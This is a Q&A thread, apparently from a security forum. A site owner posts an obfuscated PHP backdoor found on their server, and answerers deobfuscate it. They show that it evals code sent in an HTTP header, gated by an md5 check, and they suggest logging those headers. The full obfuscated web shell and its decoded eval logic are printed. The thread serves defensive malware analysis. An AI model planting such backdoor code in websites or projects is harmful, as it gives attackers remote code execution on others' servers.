11

I found this piece of code hosted on my website I'm sure it's a malware. Any have an idea what this script does or how to deobfuscate?

<?php
$nkIL3_='Hn'&~hTzup;$TTCpX='HEr@D@(DEi&'|'HD"AN`(T$I.';$fGZGQD2=l5fg.'{3Ht&d~'&'|,'./*'.
    'gri*/Nenwkf.'|3n';$u4avG3='K|P'^".<t";$n9s='om|wo~'&'om}e~~';$cX8W='O]P'^#gg_'.
    '#9e';$iPPiO='%'.q6nfB|sUuI.')6';$pU9KRba5mS='Ov~'&'x]U';$pGocQU=P&P;'GDQNB1wL'.
    ']lYd2GC]o';$SEAp9cm9=_a&_M;$CBiIA=iUVv_Z_UR_OOwCIP_iO&'^'.vTY_.'|'./*RKGtqf6J'.
    'Zc*/_Wu_DEVOcx_I.'}';$QjgmVTedxc="M@"|AE;$oyL1tNw='j3x s'^'.'.l9l6;$gI_Y=#Rsx'.
    ',)'^'~}';$pai4hk=$TTCpX|$fGZGQD2;$KaQhBHF8=$u4avG3|$cX8W;$Hz=$n9s&$iPPiO;'jH2'.
    '5r';$JeFqqp=(' '.bb3ra5.'`14@#$11t&7G4-'.Bb6y.')% 92E '|'5gB9@!!qS%2B0%8W0!fC'.
    'X&v-'.Z16w0.'$u4')&("VOW@F.H^N0f*/".CkOjFNlm."&}Y|6EOA)VH"^'()9}'.rMw1.#udQP_'.
    '}ET]'.QtTxUq.'([YHM.@D2p:Si<');if(!$pai4hk($KaQhBHF8($Hz($pU9KRba5mS./*yPL33m'.
    'Y,:(gnZ~9*/$pGocQU.$SEAp9cm9)),$JeFqqp))eval($Hz($CBiIA.$QjgmVTedxc./*X1lpmOJ'.
    '|-$J*/$oyL1tNw.$gI_Y));#d={{x(o$W#fd5B|}h-_Jgj_.9z[.XU^Iu1ZY6w;9!w xNxzp~bG^'.
    '}XB}zIH.|qChIrS(l5GFy?b#lA*:.!FHk0XG8v-a3GwnSkyI|vWMErYG~8hT!H%FlxPK';
calculataur
  • 115
  • 5

2 Answers2

11

It is a very obfuscated way of doing this:

eval(getenv(HTTP_X_UP_DEVCAP_IMMED_ALERT));

This alone won't do anything until someone views the page with the HTTP_X_UP_DEVCAP_IMMED_ALERT header set, then the content of this header will be executed on your webpage. It looks like someone wants to execude code, perhaps for a botnet.

If you are interested in this code, you can see a version on pastebin with a little more formatting and comments above each line with the values of variables and function calls etc. Please note that I've commented out the eval call to prevent accidents in case I missed something (but I thing I got everything)

EDIT I've put a new version on pastebin, basically this is what's executed:

if(!levenshtein(md5(getenv(HTTP_A)), '4fb90a5a352c459767f74f0780779254'))
    eval(getenv(HTTP_X_UP_DEVCAP_IMMED_ALERT));

IMPORTANT

I am almost sure that there is more on your webspace, you should search really well.

Tokk
  • 1,348
  • 7
  • 10
  • yes there were in every folder in the website directory same script with different obfuscation – calculataur Aug 22 '14 at 10:49
  • Nice work decoding the whole script. I would like to add that you might want to monitor your webserver for requests with the HTTP_X_UP_DEVCAP_IMMED_ALERT headers. If they are not careful to use anonymizing services, you can find out who have planted this on your server. – Dog eat cat world Aug 22 '14 at 11:53
  • @Dogeatcatworld I assume you would get the IP of a command and control server rather than the IP of the attackers themself. Nevertheless it seems to be a good idea – Tokk Aug 22 '14 at 11:56
  • @Dogeatcatworld i cleaned the server but it still might be somewhere so any idea how can i monitor and log after HTTP_X_UP_DEVCAP_IMMED_ALERT headers – calculataur Aug 25 '14 at 05:23
  • You could write a php script that logs connections that have these headers. Also grab the content of these headers, and you will see what they try to do with your server. Then insert this script on your pages that you have cleaned up. – Dog eat cat world Aug 25 '14 at 05:49
  • @calculataur you should log the values of getenv(HTTP_A) and getenv(HTTP_X_UP_DEVCAP_IMMED_ALERT). As this is all the script uses, you will see exactly what and how the attackers do. – Tokk Aug 25 '14 at 09:01
5

Malware analysis is fun! I have not done this with PHP before, but let's see what we can do.

First, I want to format it correctly. I found an online tool called PHP beautifier which does this nicely.

Output is now:

<?php
$nkIL3_ = 'Hn' & ~hTzup;
$TTCpX = 'HEr@D@(DEi&' | 'HD"AN`(eT$I.';
$fGZGQD2 = l5fg . '{3Ht&d~' & '|,' . /*'.
'gri*/
Nenwkf . '|3n';
$u4avG3 = 'K|P' ^ ".<t";
$n9s = 'om|wo~' & 'om}e~~';
$cX8W = 'O]P' ^ //gg_'.
'#9e';
$iPPiO = '%' . q6nfB | sUuI . ')6';
$pU9KRba5mS = 'Ov~' & 'x]U';
$pGocQU = P & P;
'GDQNB1wL' . ']lYd2GC]o';
$SEAp9cm9 = _a & _M;
$CBiIA = iUVv_Z_UR_OOwCIP_iO & '^' . vTY_ . '|' . /*RKGtqf6J'.
'Zc*/
_Wu_DEVOcx_I . '}';
$QjgmVTedxc = "M@" | AE;
$oyL1tNw = 'j3x s' ^ '.' . l9l6;
$gI_Y = //Rsx'.
',)' ^ '~}';
$pai4hk = $TTCpX | $fGZGQD2;
$KaQhBHF8 = $u4avG3 | $cX8W;
$Hz = $n9s & $iPPiO;
'jH2' . '5r';
$JeFqqp = (' ' . bb3ra5 . '`14@#$11t&7G4-' . Bb6y . ')% 92E ' | '5gB9@!!qS%2B0%8W0!fC' . 'X&v-' . Z16w0 . '$u4') & ("VOW@F.H^N0f*/" . CkOjFNlm . "&}Y|6EOA)VH" ^ '()9}' . rMw1 . //udQP_'.
'}ET]' . QtTxUq . '([YHM.@D2p:Si<');

if (!$pai4hk($KaQhBHF8($Hz($pU9KRba5mS . /yPL33m'.
'Y,:(gnZ~9/
$pGocQU . $SEAp9cm9)) , $JeFqqp)) eval($Hz($CBiIA . $QjgmVTedxc . /X1lpmOJ'.
'|-$J/
$oyL1tNw . $gI_Y)); //d={{x(o$W#fd5B|}h-Jgj.9z[.XU^Iu1ZY6w;9!w xNxzp~bG^'.
'}XB}zIH.|qChIrS(l5GFy?b#lA*:.!FHk0XG8v-a3GwnSkyI|vWMErYG~8hT!H%FlxPK';

This is quick and dirty, but on the 4th last line, you will see an eval function. We inspect the variables to this in an online php editor, by adding print statements. I am running this code on an online php editor:

...snip...
if (!$pai4hk($KaQhBHF8($Hz($pU9KRba5mS .$pGocQU . $SEAp9cm9)) , $JeFqqp)) {
print($Hz);
print($CBiIA);
print($QjgmVTedxc);
print($oyL1tNw);
print($gI_Y);
eval($Hz($CBiIA . $QjgmVTedxc . /*X1lpmOJ'.'|-$J*/ $oyL1tNw . $gI_Y)); //d={{x(o$W#fd5B|}h-_Jgj_.9z[.XU^Iu1ZY6w;9!w xNxzp~bG^'.
'}XB}zIH.|qChIrS(l5GFy?b#lA*:.!FHk0XG8v-a3GwnSkyI|vWMErYG~8hT!H%FlxPK';
}
...snip...

I am not able to get all the values correctly, possibly because I am not running the script as intended (browser).

I am however able to determine that the eval function does the following:

eval(getenv(HTTP_X_UP_DEVCAP_IMMED_ALERT ...));

This is a strong indication that this script is a backdoor, allowing the attacker to run commands on your web server by adding the commands in the http header HTTP_X_UP_DEVCAP_IMMED_ALERT.

Community
  • 1
Dog eat cat world
  • 5,827
  • 1
  • 28
  • 46